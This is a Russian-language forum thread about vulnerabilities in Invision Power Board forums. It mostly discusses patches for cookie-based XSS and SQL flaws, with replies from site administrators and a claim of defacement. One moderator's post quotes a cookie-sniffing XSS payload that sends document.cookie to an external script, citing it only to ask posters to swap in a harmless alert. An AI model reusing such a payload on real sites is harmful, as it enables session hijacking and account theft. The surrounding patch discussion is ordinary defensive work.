Перейти к контенту

Уязвимости форумов Invision Power Board


Рекомендуемые сообщения

1.3 - don't work

 

* * * * * *

 

я непойму, зачем делать кучу регеспов, если можно юзануть РНР функцию htmlentities ()?

 

$text = htmlentities ($text, ENT_QUOTES)

 

да, такой вопрос - где в ИПБ находится тот самый обработчик, к которому постоянно пишут патчи? :D (немогу найти..)

Изменено пользователем Spear
Ссылка на комментарий
Поделиться на других сайтах

  • Ответы 1,2k
  • Создана
  • Последний ответ

Лучшие авторы в этой теме

Лучшие авторы в этой теме

Загружено фотографий

Актуально для 2.1.3 и ниже.

 

для 2.1.3 не актуально

 

И вообще научитесь нормально постить уязвимости.

Их не надо выкладывать на форум, а просто давать ссылку на txt файл, в котором содержится строчка вызывающая XSS.

 

Потом пишете вашу версию форума и итог сработало или нет, и не надо строить предположений о том что уязвимы другие версии, потому как другие люди проверят у которых эти версии.

 

И еще все сниферы

javascript:document.images[1].src="http://античат.ru/cgi-bin/s.jpg?"+document.cookie

заменяйте на

javascript:alert(document.cookie)

Ссылка на комментарий
Поделиться на других сайтах

НА днях сложилась такая ситуация:

 

Зашел к себе на форум, а там сообщение написанное от моего имени, что форум имеет уязвимость и небезопасен. Подпись Доброжелатель. (Хорошо хоть доброжелатель попался). Был неприятно удивле, и начал проверять на предмет уязвимостей. Вроде бы все исправления уже были сделаны, но видать где то что то упустил. Написал в это же тему обращение к этому доброжелателю, как он умудрился зайти под моим именем, он мне написал

 

Читай тут.

http://dayhack.h15.ru/phpBB2/viewtopic.php?t=22

Работает до версии 2.0.4.

Думаю разберешься. связан с автологином. Если сможешь заперть, выложи у себя на форуме код.

 

Удачи. Зла не желаю.

 

Дальше я вообще ничего не понял. (Вот такой вот я хреновый админ :D )

Если кто в курсе напишите как сэтим бороться...

 

У меня версия форума 1.3

Изменено пользователем l0ky
Ссылка на комментарий
Поделиться на других сайтах

НА днях сложилась такая ситуация:

 

Зашел к себе на форум, а там сообщение написанное от моего имени, что форум имеет уязвимость и небезопасен. Подпись Доброжелатель. (Хорошо хоть доброжелатель попался). Был неприятно удивле, и начал проверять на предмет уязвимостей. Вроде бы все исправления уже были сделаны, но видать где то что то упустил. Написал в это же тему обращение к этому доброжелателю, как он умудрился зайти под моим именем, он мне написал

 

Читай тут.

http://dayhack.h15.ru/phpBB2/viewtopic.php?t=22

Работает до версии 2.0.4.

Думаю разберешься. связан с автологином. Если сможешь заперть, выложи у себя на форуме код.

 

Удачи. Зла не желаю.

 

Дальше я вообще ничего не понял. (Вот такой вот я хреновый админ :) )

Если кто в курсе напишите как сэтим бороться...

 

У меня версия форума 1.3

 

в данном разделе, найди топик Исправление уязвимостей форумов и отредактируй файлы как там написано - если все сделаешь правильно, то никто больше не взломает :D

А вообще надо следить за обновлениями - я в php и perl тоже как бы слаб, но хотя бы раз в месяц захожу на этот форум, чтобы заглянуть в Исправление уязвимостей форумов ;)

Удачи...

Ссылка на комментарий
Поделиться на других сайтах

2 NaFigator

 

У тебя не все обновления. Это довольно старая уязвимость...

 

Сегодня проверил ещё раз, вроде бы все. Уже руки опускаются. Может подскажете ссылку на конкретное исправление данной уязвимости.

 

Заранее безмерно благодарен.

Ссылка на комментарий
Поделиться на других сайтах

Сегодня проверил ещё раз, вроде бы все. Уже руки опускаются. Может подскажете ссылку на конкретное исправление данной уязвимости.

 

Заранее безмерно благодарен.

Уязвимости форумов Invision Power Board

Ссылка на комментарий
Поделиться на других сайтах

  • 3 недели спустя...

давно я не заходил ... похоже что-то прикольное пропустил

а где дефейсы ? ... хде их можно посмотреть ?

 

... проверил всё новое что появилось с моего последнего захода

на 131 сработало только с пеносами ... зашил, теперь не работает ... спасибо

 

... что касаеться ACP Note не совсем разобрался как работает

Ссылка на комментарий
Поделиться на других сайтах

Хаха!!!!!!! У вас дыра в загрузке аватара!!!!!!!! Я вам дефейсов на главную понавтыкал!!!!!!!!

 

 

Можно попросить админов прокомментировать заявление? :D

Ссылка на комментарий
Поделиться на других сайтах

Хаха!!!!!!! У вас дыра в загрузке аватара!!!!!!!! Я вам дефейсов на главную понавтыкал!!!!!!!!

Смешно :D

 

Во-первых я так чувствую Вы совершенно случайно наткнулись на "дыру", если она вообще есть - вот вас от радости и распирает. Опытный взломщик бы просто поставил сниффер и втихую бы жил с довольной харей ;)

 

Что касается дефейсов - Вы знаете, что такое "дефейс"? И почему я не заметил? Я регулярно посещаю форум..

Ссылка на комментарий
Поделиться на других сайтах

Хаха!!!!!!! У вас дыра в загрузке аватара!!!!!!!! Я вам дефейсов на главную понавтыкал!!!!!!!!

 

Немного не понял кто это под моим ником влез :D Посмотрите по IP откуда такой выискался...

Ссылка на комментарий
Поделиться на других сайтах

Немного не понял кто это под моим ником влез :D Посмотрите по IP откуда такой выискался...
Оттуда, откуда и Вы ;) тютелька в тютельку...
Ссылка на комментарий
Поделиться на других сайтах

Немного не понял кто это под моим ником влез ;) Посмотрите по IP откуда такой выискался...
Оттуда, откуда и Вы :) тютелька в тютельку...

Эх... Странные эти фаны воблы... :D

Ссылка на комментарий
Поделиться на других сайтах

Оттуда, откуда и Вы тютелька в тютельку

 

Упс. Вообще-то я нахожусь внутри локальной сети и внешний IP может быть похож у многих пользователей. Интерестно получается. Сегодня позвоню провайдеру узнаю как это могло получиться.

Ссылка на комментарий
Поделиться на других сайтах

  • 4 недели спустя...

GIV, Vitaly!

 

В последней найденой уязвимости, последне исправление:

//$topic_array = array_slice( array_keys( $topics ), 0, 5 );

на

$topic_array = $std->clean_int_array( $topic_array );

неправильное, потому что теряется список просмотренных тем в личных данных.

 

Должно быть:

$topic_array = array_slice( array_keys( $std->clean_int_array( $topics ) ), 0, 5 );

ну или что-то типа того!

 

Ссылка на предложенное исправление:

IPB 2.x.x: Обновление безопасности

Изменено пользователем Anna
Ссылка на комментарий
Поделиться на других сайтах

да да да кстати

у меня такая же фигня

вот даже тему открыл отдельную :D

По поводу новой уязвимости. Глюк после исправления. ;)

Ссылка на комментарий
Поделиться на других сайтах

GIV, Vitaly!

 

В последней найденой уязвимости, последне исправление:

//$topic_array = array_slice( array_keys( $topics ), 0, 5 );

на

$topic_array = $std->clean_int_array( $topic_array );

неправильное, потому что теряется список просмотренных тем в личных данных.

 

Должно быть:

$topic_array = array_slice( array_keys( $std->clean_int_array( $topics ) ), 0, 5 );

ну или что-то типа того!

 

Ссылка на предложенное исправление:

IPB 2.x.x: Обновление безопасности

 

Верно, там добавление строки после, а не замена...

Ссылка на комментарий
Поделиться на других сайтах

Для версий IPB 2.0.x:

 

Файл sources\functions.php, найти код:

$ibforums->forum_read[$id] = $stamp;

заменить на:

$this->forum_read[ intval($id) ] = intval($stamp);

еще одна ошибочка, если я ничего не путаю:

заменять надо на

$ibforums->forum_read[ intval($id) ] = intval($stamp);

Ссылка на комментарий
Поделиться на других сайтах

Для версий IPB 2.0.x:

 

Файл sources\functions.php, найти код:

$ibforums->forum_read[$id] = $stamp;

заменить на:

$this->forum_read[ intval($id) ] = intval($stamp);

еще одна ошибочка, если я ничего не путаю:

заменять надо на

$ibforums->forum_read[ intval($id) ] = intval($stamp);

 

Верно. 2 раза пришлось писать Matt'у. Ух, ленится он все перепроверить... :D

Ссылка на комментарий
Поделиться на других сайтах

После исправления последней уязвимости иногда вылазит следущее:

ПРЕДУПРЕЖДЕНИЕ IPB [2] Invalid argument supplied for foreach() (Файл: /sources/functions.php. Строка: 1911)

 

На той самой строчке - функция добавленная при исправлении

	/*-------------------------------------------------------------------------*/
// Makes topics read or forum read cookie safe		 
/*-------------------------------------------------------------------------*/
/**
* Makes int based arrays safe
* XSS Fix: Ticket: 243603
* Problem with cookies allowing SQL code in keys
*
* @param	array	Array
* @return	array	Array (Cleaned)
* @since	2.1.4(A)
*/
function clean_int_array( $array=array() )
{
	$return = array();

	foreach( $array as $k => $v )
	{
		$return[ intval($k) ] = intval($v);
	}

	return $return;
}

 

Появляется периодически (не всегда) при "Перейти к последнему непрочитанному сообщению" ...

 

У кого нибудь ещё было? Как бороться?

 

P.S. Проверено неоднократно. Все изменения сделаланы правильно.

Ссылка на комментарий
Поделиться на других сайтах


×
×
  • Создать...

Важная информация

Находясь на нашем сайте, вы соглашаетесь на использование файлов cookie, а также с нашим положением о конфиденциальности Политика конфиденциальности и пользовательским соглашением Условия использования.